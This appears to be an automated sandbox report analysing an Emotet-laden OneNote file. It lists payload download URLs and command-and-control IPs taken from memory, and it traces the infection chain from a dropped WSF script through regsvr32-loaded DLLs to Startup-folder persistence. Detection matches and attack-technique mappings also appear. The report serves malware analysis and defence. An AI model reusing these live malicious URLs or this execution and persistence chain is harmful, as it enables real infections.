                    Source: wscript.exe, 00000001.00000003.408902760.0000000005AFF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409154486.0000000005B12000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408939455.0000000005B0A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.416198169.0000000005B1A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409946168.0000000005B1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/s/
                    Source: wscript.exe, 00000001.00000003.410811834.00000000053B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/tM
                    Source: wscript.exe, 00000001.00000003.409054917.0000000005B3D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409368396.0000000005B3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409588847.0000000005B4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.416274274.0000000005B57000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409409593.0000000005B48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://penshorn.org:443/admin/Ses8712iGR8du/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
                    Source: wscript.exe, wscript.exe, 00000001.00000003.393259366.00000000056E4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.416528586.0000000005BCD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408026023.0000000005A06000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405664335.00000000059F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409054917.0000000005B3D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393226362.0000000005711000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.392299007.000000000570C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408902760.0000000005AFF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399568142.0000000005928000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.414126316.0000000005A82000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400542411.0000000005928000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401268867.00000000059A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.412516217.0000000005A36000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409762682.0000000005B87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399201970.00000000058F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.410581041.0000000005BCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.387940812.0000000005BB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394922574.00000000057FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395880464.00000000057D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 
00000001.00000003.397247854.000000000583C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/
                    Source: wscript.exe, 00000001.00000003.408129613.0000000005AC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407753582.0000000005A74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408410878.0000000005AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.406833763.0000000005A3E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.406423149.0000000005A36000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407871524.0000000005A8B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408716059.0000000005AD9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407092304.0000000005A5C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407538773.0000000005A63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/am
                    Source: wscript.exe, 00000001.00000003.410811834.00000000053B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wM
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://powerlift.acompli.net
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
                    Source: wscript.exe, process memory (.sdmp), String found in binary or memory: https://www.gomespontes.com.br/logs/pd/
                    Source: wscript.exe, process memory (.sdmp), String found in binary or memory: https://www.gomespontes.com.br/logs/pd/EC24
                    Source: wscript.exe, process memory (.sdmp), String found in binary or memory: https://www.gomespontes.com.br/logs/pd/vM
                    Source: unknown, HTTP traffic detected: POST /xqnhpb/ HTTP/1.1; Connection: Keep-Alive; Content-Length: 0; Host: 182.162.143.56
                    Source: unknown, DNS traffic detected: queries for: penshorn.org
                    Source: global traffic, HTTP traffic detected: GET /admin/Ses8712iGR8du/ HTTP/1.1; Connection: Keep-Alive; Accept: */*; User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5); Host: penshorn.org
                    Source: unknown, HTTPS traffic detected: 203.26.41.131:443 -> 192.168.2.4:49696, version: TLS 1.2
                    Source: unknown, HTTPS traffic detected: 182.162.143.56:443 -> 192.168.2.4:49700, version: TLS 1.2

                    E-Banking Fraud

                    Source: Yara match, File source: 00000004.00000002.884803420.0000000000C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 3.2.regsvr32.exe.1290000.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 4.2.regsvr32.exe.c30000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 4.2.regsvr32.exe.c30000.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 3.2.regsvr32.exe.1290000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 00000004.00000002.884606012.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000003.00000002.382454189.0000000001290000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000004.00000002.885272914.0000000002521000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: 00000001.00000003.408902760.0000000005AFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: WEBSHELL_asp_generic, date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
                    Source: C:\Windows\System32\regsvr32.exe, File created: C:\Windows\system32\JURwocL\
                    Source: C:\Windows\System32\regsvr32.exe; Code function: 3_2_0000000180010C10 LdrFindResource_U,LdrAccessResource,NtAllocateVirtualMemory
                    Source: C:\Windows\System32\regsvr32.exe; Code function: 3_2_0000000180010AC0 ExitProcess,RtlQueueApcWow64Thread,NtTestAlert
                    Source: C:\Windows\System32\regsvr32.exe; Code function: 3_2_0000000180010DB0 ZwOpenSymbolicLinkObject,ZwOpenSymbolicLinkObject
                    Source: C:\Windows\SysWOW64\regsvr32.exe; Section loaded: sfc.dll
                    Source: C:\Windows\System32\regsvr32.exe; Section loaded: sfc.dll
                    Source: Joe Sandbox View; Dropped File: C:\Users\user\AppData\Local\Temp\radC7DCA.tmp.dll 2F39C2879989DDD7F9ECF52B6232598E5595F8BF367846FF188C9DFBF1251253
                    Source: iMedPub_LTD_6.one; ReversingLabs: Detection: 30%
                    Source: iMedPub_LTD_6.one; Virustotal: Detection: 40%
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                    Source: unknown; Process created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE "C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\iMedPub_LTD_6.one"
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE; Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf"
                    Source: C:\Windows\SysWOW64\wscript.exe; Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radC7DCA.tmp.dll"
                    Source: C:\Windows\SysWOW64\regsvr32.exe; Process created: C:\Windows\System32\regsvr32.exe "C:\Users\user\AppData\Local\Temp\radC7DCA.tmp.dll"
                    Source: C:\Windows\System32\regsvr32.exe; Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\JURwocL\wAXwf.dll"
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE; Process created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE /tsr
                    Source: C:\Windows\SysWOW64\wscript.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32
                    Source: Send to OneNote.lnk.0.dr; LNK file: ..\..\..\..\..\..\..\..\..\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE; File created: C:\Users\user\Documents\{C7A88BE3-9A9F-418C-B394-3F1FA3D28273}
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE; File created: C:\Users\user\AppData\Local\Temp\{3B180607-2A0E-43AC-B02B-544D2B7818E6} - OProcSessId.dat
                    Source: classification engine; Classification label: mal100.troj.expl.evad.winONE@11/430@1/49
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE; File read: C:\Program Files (x86)\desktop.ini
                    Source: C:\Windows\System32\regsvr32.exe; Code function: 3_2_028E8BC8 Process32FirstW,CreateToolhelp32Snapshot,FindCloseChangeNotification
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE; Mutant created: \Sessions\1\BaseNamedObjects\OneNoteM:AppShared
                    Source: C:\Windows\SysWOW64\wscript.exe; File read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\regsvr32.exe; File read: C:\Windows\System32\drivers\etc\hosts
                    Source: Window Recorder; Window detected: More than 3 window changes detected
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
                    Source: radC7DCA.tmp.dll.1.dr; Static PE information: section name: _RDATA
                    Source: C:\Windows\SysWOW64\wscript.exe; Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radC7DCA.tmp.dll"
                    Source: C:\Windows\System32\regsvr32.exe; File created: C:\Windows\System32\JURwocL\wAXwf.dll (copy)
                    Source: C:\Windows\SysWOW64\wscript.exe; File created: C:\Users\user\AppData\Local\Temp\radC7DCA.tmp.dll
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE; File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\System32\regsvr32.exe; File opened: C:\Windows\system32\JURwocL\wAXwf.dll:Zone.Identifier read attributes | delete
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE; Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\wscript.exe; Process information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE; Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\wscript.exe TID: 5960; Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\System32\regsvr32.exe TID: 4608; Thread sleep time: -660000s >= -30000s
                    Source: C:\Windows\System32\regsvr32.exe; API coverage: 9.0 %
                    Source: C:\Windows\SysWOW64\wscript.exe; Window found: window name: WSH-Timer
                    Source: C:\Windows\System32\regsvr32.exe; Process information queried: ProcessInformation
                    Source: C:\Windows\System32\regsvr32.exe; Code function: 3_2_0000000180008D28 FindFirstFileExW
                    Source: C:\Windows\System32\regsvr32.exe; File Volume queried: C:\ FullSizeInformation
                    Source: wscript.exe and regsvr32.exe memory dumps; Binary or memory string: Hyper-V RAW
                    Source: wscript.exe memory dumps; Binary or memory string: Hyper-V RAWen-USn
                    Source: C:\Windows\System32\regsvr32.exe; Code function: 3_2_0000000180001C48 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                    Source: C:\Windows\System32\regsvr32.exe; Code function: 3_2_000000018000A878 GetProcessHeap
                    Source: C:\Windows\System32\regsvr32.exe; Code function: 3_2_0000000180010C10 LdrFindResource_U,LdrAccessResource,NtAllocateVirtualMemory
                    Source: C:\Windows\System32\regsvr32.exe; Code function: 3_2_00000001800082EC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                    Source: C:\Windows\System32\regsvr32.exe; Code function: 3_2_00000001800017DC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Windows\SysWOW64\wscript.exe; Domain query: penshorn.org
                    Source: C:\Windows\SysWOW64\wscript.exe; Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radC7DCA.tmp.dll"
                    Source: C:\Windows\System32\regsvr32.exe; Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\regsvr32.exe; Code function: 3_2_00000001800070A0 cpuid
                    Source: C:\Windows\SysWOW64\wscript.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: C:\Windows\System32\regsvr32.exe; Code function: 3_2_0000000180001D98 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter

                    Stealing of Sensitive Information

                    Source: Yara match; File source: iMedPub_LTD_6.one, type: SAMPLE
                    Source: Yara match; File source: 00000004.00000002.884803420.0000000000C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 3.2.regsvr32.exe.1290000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.2.regsvr32.exe.c30000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.2.regsvr32.exe.c30000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 3.2.regsvr32.exe.1290000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000004.00000002.884606012.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000003.00000002.382454189.0000000001290000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000004.00000002.885272914.0000000002521000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

                    Remote Access Functionality

                    Source: Yara match; File source: iMedPub_LTD_6.one, type: SAMPLE

                    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
                    Execution: Scripting (1); Exploitation for Client Execution (1); At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
                    Persistence: Registry Run Keys / Startup Folder (2); DLL Side-Loading (1); Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
                    Privilege Escalation: Process Injection (111); Registry Run Keys / Startup Folder (2); DLL Side-Loading (1); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
                    Defense Evasion: Masquerading (21); Virtualization/Sandbox Evasion (1); Process Injection (111); Scripting (1); Hidden Files and Directories (1); Obfuscated Files or Information (1); Regsvr32 (1); DLL Side-Loading (1)
                    Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
                    Discovery: System Time Discovery (1); Security Software Discovery (121); Virtualization/Sandbox Evasion (1); Process Discovery (2); Remote System Discovery (1); File and Directory Discovery (2); System Information Discovery (25); Network Service Scanning
                    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
                    Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
                    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                    Command and Control: Encrypted Channel (11); Non-Standard Port (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (3); Application Layer Protocol (114); Multiband Communication; Commonly Used Port; Application Layer Protocol
                    Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
                    Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
                    Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue
                    Behavior graph (ID: 828505, Sample: iMedPub_LTD_6.one, Startdate: 17/03/2023, Architecture: WINDOWS, Score: 100). Process chain: ONENOTE.EXE started wscript.exe and ONENOTEM.EXE; wscript.exe contacted penshorn.org (203.26.41.131, port 443), dropped C:\Users\user\AppData\Local\Temp\click.wsf (ASCII) and C:\Users\user\AppData\...\radC7DCA.tmp.dll (PE32+), and started regsvr32.exe; that regsvr32.exe started a second regsvr32.exe, which dropped C:\Windows\System32\...\wAXwf.dll (copy) (PE32+) and started a third regsvr32.exe; the third regsvr32.exe connected to 45.235.8.30 (port 8080), 169.57.156.166 (port 8080) and 21 other IPs or domains.

                    Source | Detection | Scanner | Label
                    iMedPub_LTD_6.one | 31% | ReversingLabs | Win32.Trojan.OneNote
                    iMedPub_LTD_6.one | 41% | Virustotal |

                    Source | Detection | Scanner | Label
                    C:\Users\user\AppData\Local\Temp\radC7DCA.tmp.dll | 58% | ReversingLabs | Win64.Trojan.Emotet
                    C:\Windows\System32\JURwocL\wAXwf.dll (copy) | 58% | ReversingLabs | Win64.Trojan.Emotet

                    Source | Detection | Scanner | Label
                    3.2.regsvr32.exe.1290000.0.unpack | 100% | Avira | HEUR/AGEN.1215476
                    4.2.regsvr32.exe.c30000.0.unpack | 100% | Avira | HEUR/AGEN.1215476

                    Source | Detection | Scanner | Label
                    penshorn.org | 11% | Virustotal |
                    SourceDetectionScannerLabelLink

Name | IP | Active | Malicious | Antivirus Detection | Reputation
penshorn.org | 203.26.41.131 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://182.162.143.56/xqnhpb/ | true | Avira URL Cloud: malware | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://213.239.212.5///regsvr32.exe, 00000004.00000002.884919905.0000000000D06000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: malware
                                                                                                                unknown
                                                                                                                https://45.235.8.30:8080/xqnhpb/b/4regsvr32.exe, 00000004.00000002.884919905.0000000000D06000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: malware
                                                                                                                unknown
                                                                                                                https://penshorn.org:443/admin/Ses8712iGR8du/wscript.exe, 00000001.00000003.409054917.0000000005B3D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409368396.0000000005B3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409588847.0000000005B4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.416274274.0000000005B57000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409409593.0000000005B48000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                • Avira URL Cloud: malware
                                                                                                                unknown
                                                                                                                https://103.43.75.120/Pregsvr32.exe, 00000004.00000002.884919905.0000000000D06000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: malware
                                                                                                                unknown
                                                                                                                https://api.diagnosticssdf.office.com0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                                                                                  high
                                                                                                                  https://login.microsoftonline.com/0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                                                                                    high
                                                                                                                    http://softwareulike.com/cWIYxWMPkK/wscript.exe, wscript.exe, 00000001.00000003.393259366.00000000056E4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.416528586.0000000005BCD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408026023.0000000005A06000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405664335.00000000059F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409054917.0000000005B3D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393226362.0000000005711000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.392299007.000000000570C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408902760.0000000005AFF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399568142.0000000005928000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.414126316.0000000005A82000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400542411.0000000005928000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401268867.00000000059A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.412516217.0000000005A36000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409762682.0000000005B87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399201970.00000000058F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.410581041.0000000005BCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.387940812.0000000005BB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394922574.00000000057FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 
00000001.00000003.395880464.00000000057D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397247854.000000000583C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: malware
                                                                                                                    unknown
                                                                                                                    https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                                                                                      high
                                                                                                                      https://45.235.8.30:8080/xqnhpb//regsvr32.exe, 00000004.00000002.884919905.0000000000D06000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: malware
                                                                                                                      unknown
                                                                                                                      https://api.addins.omex.office.net/appinfo/query0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                                                                                        high
                                                                                                                        https://clients.config.office.net/user/v1.0/tenantassociationkey0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                                                                                          high
                                                                                                                          https://powerlift.acompli.net0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://cortana.ai0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
Joe Sandbox Version: 37.0.0 Beryl
Analysis ID: 828505
Start date and time: 2023-03-17 09:21:51 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 17s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: iMedPub_LTD_6.one
Detection: MAL
Classification: mal100.troj.expl.evad.winONE@11/430@1/49
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 50.2% (good quality ratio 42.4%)
• Quality average: 60.5%
• Quality standard deviation: 35.6%
HCA Information:
• Successful, ratio: 89%
• Number of executed functions: 20
• Number of non-executed functions: 136
Cookbook Comments:
• Found application associated with file extension: .one
• Override analysis time to 240s for rundll32
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, rundll32.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
• Excluded IPs from analysis (whitelisted): 52.109.76.141, 20.126.106.131, 20.223.130.133, 209.197.3.8
• Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, config.officeapps.live.com, prod.configsvc1.live.com.akadns.net, nexus.officeapps.live.com, ctldl.windowsupdate.com, officeclient.microsoft.com, cds.d2s7q6s2.hwcdn.net, wu-bg-shim.trafficmanager.net, europe.configsvc1.live.com.akadns.net
• Not all processes where analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtQueryVolumeInformationFile calls found.
• Report size getting too big, too many NtReadFile calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
09:23:29 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk
09:23:35 | API Interceptor | 2x Sleep call for process: wscript.exe modified
09:24:02 | API Interceptor | 23x Sleep call for process: regsvr32.exe modified
                                                                                                                                                                  OPAST_GROUP.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 203.26.41.131
                                                                                                                                                                  Opast_International.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 203.26.41.131
                                                                                                                                                                  opastonline.com.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 203.26.41.131
                                                                                                                                                                  Opast_Publishing_Group_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 203.26.41.131
                                                                                                                                                                  Opast_Publishing_Group.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 203.26.41.131
                                                                                                                                                                  omicsonline.net.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 203.26.41.131
                                                                                                                                                                  aRThcK3rSO.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, RedLine, SmokeLoaderBrowse
                                                                                                                                                                  • 203.26.41.131
                                                                                                                                                                  click.wsfGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 203.26.41.131
                                                                                                                                                                  setup.exeGet hashmaliciousAmadey, Djvu, RedLine, SmokeLoaderBrowse
                                                                                                                                                                  • 203.26.41.131
